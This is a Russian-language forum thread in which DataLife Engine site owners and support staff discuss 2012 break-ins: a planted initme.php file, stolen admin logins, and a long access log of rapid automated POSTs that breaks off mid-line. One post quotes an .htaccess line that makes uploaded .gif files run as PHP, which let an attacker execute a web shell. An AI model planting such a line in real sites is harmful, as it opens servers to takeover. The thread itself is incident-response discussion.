MiXa 5 Опубликовано: 7 декабря 2012 Рассказать Опубликовано: 7 декабря 2012 Как взломали - пока не понятно, в папке engine появился файл initme.php Это только у меня? Или у кого-то еще такая красота появилась? Стоят модули linkenso_v.2.0 и ulogin-ulogin-DLE Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 986 Опубликовано: 7 декабря 2012 Рассказать Опубликовано: 7 декабря 2012 MiXa, Скорее всего у вас был украден FTP или root доступ к серверу. Как воруются доступы и какие меры предпринять вы можете прочитать в темах на форуме http://forum.dle-new...ndpost&p=175979 http://forum.dle-new...32928&hl=iframe Там подробно описано как могут вороваться FTP доступы и как от этого защитится. Проверяйте свой компьютер на вирусы, меняйте все пароли, в том числе и по FTP и к БД. Установите ограничение по IP на доступ по FTP. Также в обязательном порядке вам нужно полностью перезаливать все файлы скрипта на оригинальные из архива дистрибутива. Если установлены сторонние модули или скрипты их нужно в обязательном порядке убирать на вашем аккаунте на сервере. Цитата Ссылка на сообщение Поделиться на других сайтах
MiXa 5 Опубликовано: 8 декабря 2012 Рассказать Опубликовано: 8 декабря 2012 Автор Владимир, претензий к DLE - нет . Просто предупреждаю людей, что заливают файл initme.php и продают ссылки в сапе Цитата Ссылка на сообщение Поделиться на других сайтах
sergeylost 0 Опубликовано: 9 декабря 2012 Рассказать Опубликовано: 9 декабря 2012 Владимир, претензий к DLE - нет . Просто предупреждаю людей, что заливают файл initme.php и продают ссылки в сапе Да, подтвержаю господа, у меня на сайте не далее чем вчера (www.spbtur.ru) как то где то был спи*жен доступ к сайту и влита эта зараза, я решил не рисковать и переустановил все файлы из дистрибутива. Поменял все пароли. Так что спасибо вам. У меня ушла панель регистрации-логина с сайта. В коде она была а реально нет. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 9 декабря 2012 Рассказать Опубликовано: 9 декабря 2012 sergeylost, MiXa, а как называется хостинг провайдер? Цитата Ссылка на сообщение Поделиться на других сайтах
MiXa 5 Опубликовано: 9 декабря 2012 Рассказать Опубликовано: 9 декабря 2012 (изменено) Автор sergeylost, MiXa, а как называется хостинг провайдер? VDS Короче, было обновление php, при обновлении глобол_регистр оказалось включенным. Через один из сайтов, которые давно не обновлял (не мой сайт, делал для людей), с помощью инъекции добавили админа, разместили в аплоаде в хтаакссес строчку "AddHandler application/x-httpd-php .Gif", заливали php файл с шелом? с расширением gif и безобразничали... Как-то так Спасибо ребята помогли, наши и вычистили эту дрянь Изменено 9 декабря 2012 пользователем MiXa Цитата Ссылка на сообщение Поделиться на других сайтах
Captain 613 Опубликовано: 9 декабря 2012 Рассказать Опубликовано: 9 декабря 2012 Судя по whois - valuehost.ru Цитата Ссылка на сообщение Поделиться на других сайтах
DimkaG 5 Опубликовано: 9 декабря 2012 Рассказать Опубликовано: 9 декабря 2012 (изменено) вот я прочитал на одном форуме такую хрень. http://forum.searche...ad.php?t=759755 проверил по логам действий в админ панели такого ip нет но есть другой с точно такими же действиями. Версия 9,7 , лицензия на reg-ur.ru Версия DataLife Engine: 9.7 Тип лицензии скрипта: Лицензия активирована Режим работы сайта: Включен Операционная система: FreeBSD 8.2-RELEASE Версия PHP: 5.2.13 Версия MySQL: 5.0.90-log MySQLi Информация о GD: GD Version: 2.0 or higher, FreeType Support: Enabled, FreeType Linkage: with freetype, T1Lib Support: Enabled, GIF Read Support: Enabled, GIF Create Support: Enabled, JPG Support: Enabled, PNG Support: Enabled, WBMP Support: Enabled, XPM Support: Disabled, XBM Support: Disabled, JIS-mapped Japanese Font Support: Disabled, Module mod_rewrite Включен Безопасный режим: Выключен Выделено оперативной памяти: 64M Отключенные функции: Неопределено Максимальный размер загружаемого файла: 15 Mb Размер свободного места на диске: 1992,69 Gb У себя нашёл такой адрес 95.141.41.2 09.12.2012 02:11:28 Администратор 95.141.41.2 Редактирование файла шаблона: 433/main.tpl 09.12.2012 02:11:16 Администратор 95.141.41.2 Авторизация в админпанели сайта (ввод логина и пароля). патч установлен последний. пароль 8 символов включая загл,буквы, цифры.... Проврьте у себя, возможно у вас тоже есть такие штуки... Изменено 9 декабря 2012 пользователем DimkaG Цитата Ссылка на сообщение Поделиться на других сайтах
DimkaG 5 Опубликовано: 9 декабря 2012 Рассказать Опубликовано: 9 декабря 2012 (изменено) _ Изменено 9 декабря 2012 пользователем DimkaG Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 986 Опубликовано: 10 декабря 2012 Рассказать Опубликовано: 10 декабря 2012 DimkaG, В вашем случае случае злоумышленник знает ваш администраторский пароль и зашел в админпанель обычным легальным способом введя логин и пароль, потом таким же легальным способом отредактировал шаблон в админпанели. Цитата Ссылка на сообщение Поделиться на других сайтах
DimkaG 5 Опубликовано: 10 декабря 2012 Рассказать Опубликовано: 10 декабря 2012 там получается на разных сайтах разные пароли, доступы к FTP, которые знают только 2 человека, пароли уникальные и нигде больше не светятся... а то,что по случаю, который привёл товарищ с того форума 1:1 повторяет ситуацию с изменением именно главного шаблона и установку одного и того же модуля, заход именно под администраторскими правами, подсказывает что всётаки либо неизвастная дырка, либо он угадывает пароли налету =) Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 986 Опубликовано: 10 декабря 2012 Рассказать Опубликовано: 10 декабря 2012 там получается на разных сайтах разные пароли, доступы к FTP, которые знают только 2 человека, пароли уникальные и нигде больше не светятся... а то,что по случаю, который привёл товарищ с того форума 1:1 повторяет ситуацию с изменением именно главного шаблона и установку одного и того же модуля, заход именно под администраторскими правами, подсказывает что всётаки либо неизвастная дырка, либо он угадывает пароли налету =) В логах что написаны на сайте стандартное редактирование шаблонов, это не угадывание и не ситуация один в один, эти логи есть у каждого сайта где администратор редактировал шаблон в админпанели, т.е. на тысячах сайтов есть такие логи что приведены, потому как я повторюсь это легальное редактирование шаблона со стороны администратора, и легальный вход в админпанель, т.е. путем ввода логина и пароля. Поэтому говорить что это какая то одна и та же ситуация взлома попросту бесмысленно. По данным логам нет взлома. Есть вход в админпанель путем ввода логина и пароля. Абсолютно легальный вход в админпанель. Эти логи говорят о легальном входе, а не взломе. А вот как украли доступ это другой вопрос. Его могли украсть отправив невнимательного администратора на фишинг страницу, с точной копией его сайта и он думает что авторизуется на своем сайте, можно через трояны на компьютере и т.д. и т.п. Вариантов воровства паролей сотни. И это далеко не угадывание и сложность пароля не защищает от того что его нельзя украсть. Сложность пароля позволяет защитить его от подбора, но в ваших логах перебора паролей нет, а от воровства пароля его сложность никак не защищает. Для того чтобы защитить свой пароль даже если его украдут, на сайте при редактировании профиля можно ограничить вход в админпанель только для определенных IP. Цитата Ссылка на сообщение Поделиться на других сайтах
DimkaG 5 Опубликовано: 11 декабря 2012 Рассказать Опубликовано: 11 декабря 2012 там получается на разных сайтах разные пароли, доступы к FTP, которые знают только 2 человека, пароли уникальные и нигде больше не светятся... а то,что по случаю, который привёл товарищ с того форума 1:1 повторяет ситуацию с изменением именно главного шаблона и установку одного и того же модуля, заход именно под администраторскими правами, подсказывает что всётаки либо неизвастная дырка, либо он угадывает пароли налету =) В логах что написаны на сайте стандартное редактирование шаблонов, это не угадывание и не ситуация один в один, эти логи есть у каждого сайта где администратор редактировал шаблон в админпанели, т.е. на тысячах сайтов есть такие логи что приведены, потому как я повторюсь это легальное редактирование шаблона со стороны администратора, и легальный вход в админпанель, т.е. путем ввода логина и пароля. Поэтому говорить что это какая то одна и та же ситуация взлома попросту бесмысленно. По данным логам нет взлома. Есть вход в админпанель путем ввода логина и пароля. Абсолютно легальный вход в админпанель. Эти логи говорят о легальном входе, а не взломе. А вот как украли доступ это другой вопрос. Его могли украсть отправив невнимательного администратора на фишинг страницу, с точной копией его сайта и он думает что авторизуется на своем сайте, можно через трояны на компьютере и т.д. и т.п. Вариантов воровства паролей сотни. И это далеко не угадывание и сложность пароля не защищает от того что его нельзя украсть. Сложность пароля позволяет защитить его от подбора, но в ваших логах перебора паролей нет, а от воровства пароля его сложность никак не защищает. Для того чтобы защитить свой пароль даже если его украдут, на сайте при редактировании профиля можно ограничить вход в админпанель только для определенных IP. Согласен, но настоятельно рекомендую закрыть доступ к этим двум IP адресам Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 11 декабря 2012 Рассказать Опубликовано: 11 декабря 2012 95.141.41.2 У моего клиента сайт тоже взломали и логи там такие: 159.253.22.8 - - [08/Dec/2012:11:46:52 +0400] "GET http://домен/index.php?do=feedback" 200 23052 "-" "libwww-perl/5.836" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:53 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:53 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:53 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:53 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:53 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:54 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:54 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:54 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:54 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:55 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:55 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:55 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:55 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:55 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:55 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:56 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:56 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:56 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:56 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:56 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:56 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:57 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:57 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:57 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:57 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:57 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:58 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:58 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:58 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:58 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:58 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:58 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:59 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:59 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:59 +0400] "POST http://домен/" 200 35483 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:59 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:59 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:59 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:00 +0400] "POST http://домен/" 200 32073 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:46:54 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:00 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:01 +0400] "POST http://домен/" 200 15681 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:01 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:02 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:02 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:02 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:02 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:02 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:03 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:03 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:04 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:04 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:04 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:04 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:04 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:05 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:05 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:05 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:05 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:05 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:05 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:06 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:06 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:07 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:03 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:03 +0400] "POST http://домен/" 200 32073 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:03 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:06 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:06 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:06 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:10 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:11 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:11 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:11 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:11 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:11 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:12 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:12 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:12 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:13 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:12 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:12 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:13 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:13 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:14 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:14 +0400] "POST http://домен/" 200 35483 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:14 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:14 +0400] "POST http://домен/" 200 32073 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:15 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:16 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:16 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:13 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:14 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:14 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:15 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:15 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:16 +0400] "POST http://домен/" 200 36931 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:16 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:16 +0400] "POST http://домен/" 200 35483 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:17 +0400] "POST http://домен/" 200 32073 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:17 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:17 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:17 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:17 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:17 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:18 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:18 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:18 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:18 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:18 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:18 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:19 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:19 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:19 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:19 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:19 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:19 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:20 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:20 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:20 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:20 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:20 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:20 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:21 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:21 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:21 +0400] "POST http://домен/" 200 35483 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:21 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:21 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:21 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:22 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:22 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:22 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:22 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:23 +0400] "POST http://домен/" 200 32073 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:22 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:22 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:23 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:24 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:24 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:24 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:24 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:24 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:25 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:25 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:25 +0400] "POST http://домен/" 200 15681 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:26 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:28 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:28 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:26 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:26 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:26 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:26 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:27 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:27 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:27 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:27 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:27 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:27 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:28 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:28 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:28 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:29 +0400] "POST http://домен/" 200 35483 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:29 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:28 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:29 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:29 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:29 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:29 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:30 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:30 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:30 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:31 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:31 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:31 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:32 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:32 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:32 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:32 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:33 +0400] 